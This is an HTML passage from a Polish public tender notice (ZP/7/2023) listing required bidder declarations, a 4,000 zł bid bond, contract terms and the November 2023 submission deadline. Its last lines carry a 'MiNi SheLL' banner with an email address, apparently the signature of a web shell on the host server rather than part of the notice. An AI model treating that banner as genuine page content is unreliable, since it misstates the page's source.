dowodowych: </h3> Zamawiający nie stawia wymagań w tym zakresie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 13.2.1. Formularz ofertowy stanowiący Załącznik Nr 2 do SWZ.<br/>13.2.2. Oświadczenie Wykonawcy aktualne na dzień składania ofert<br/>o niepodleganiu wykluczeniu z postępowania oraz spełnianiu<br/>warunków udziału w postępowaniu – zgodnie ze wzorem stanowiącym<br/>Załącznik Nr 3 do SWZ.<br/>13.2.3. Oświadczenie składane w związku z art. 7. ust. 1. ustawy z dnia<br/>13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego (tekst jednolity: z dnia 16 czerwca<br/>2023 r. Dz. U. z 2023 r., poz. 1497 z późniejszymi zmianami) – zgodnie<br/>ze wzorem stanowiącym Załącznik Nr 4 do SWZ.<br/>13.2.7. Pełnomocnictwo (jeżeli dotyczy) upoważniające do złożenia oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 23.1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>4 000,00 zł (słownie: cztery tysiące złotych 00/100 groszy);<br/>23.2. Wadium wnosi się przed upływem terminu składania ofert.<br/>23.3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>23.3.1. pieniądzu;<br/>23.3.2. gwarancjach bankowych;<br/>23.3.3. gwarancjach ubezpieczeniowych;<br/>23.3.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b. ust. 5.<br/>pkt 2) ustawy z dnia 09 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości (tekst jednolity: z dnia 27 stycznia 2023 r. Dz. U.<br/>z 2023 r. poz. 462 z późniejszymi zmianami).<br/>23.4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku BGK numer<br/>rachunku: 42 1130 1017 0021 1002 0290 0004 z dopiskiem „Wadium – ZP/7/2023”. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 13.2. Na ofertę składają się następujące dokumenty (w postaci elektronicznej<br/>podpisanej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym):<br/>13.2.4. Zobowiązanie Podmiotu udostępniającego zasoby (jeżeli dotyczy)<br/>do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego Zamówienia: lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując Zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów – dotyczy ofert składanych przez<br/>Wykonawców, którzy w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu polegają na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby. Wzór Zobowiązania Podmiotu<br/>udostępniającego zasoby wraz z oświadczeniem o braku podstaw<br/>wykluczenia stanowi Załącznik Nr 5 do SWZ.<br/>13.2.5. Oświadczenie Podmiotu udostępniającego swoje zasoby (jeżeli dotyczy)<br/>składane w związku z art. 7. ust. 1. ustawy z dnia 13 kwietnia 2022 r.<br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (tekst jednolity: z dnia 16 czerwca 2023 r. Dz. U. z 2023 r.,<br/>poz. 1497 z późniejszymi zmianami) – zgodnie ze wzorem stanowiącym<br/>Załącznik Nr 6 do SWZ.<br/>13.2.6. Oświadczenie o podziale obowiązków (jeżeli dotyczy) z którego wynika,<br/>które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy wspólnie ubiegający się o udzielenie Zamówienia: – wzór<br/>Oświadczenia o podziale obowiązków w trakcie realizacji Zamówienia:<br/>stanowi Załącznik Nr 7 do SWZ.<br/>13.2.8. Pełnomocnictwo (jeżeli dotyczy) dla pełnomocnika do reprezentowania<br/>w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie<br/>Zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres i rodzaj zmian umowy został wskazany w załączony wzorze Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-09 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-09 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com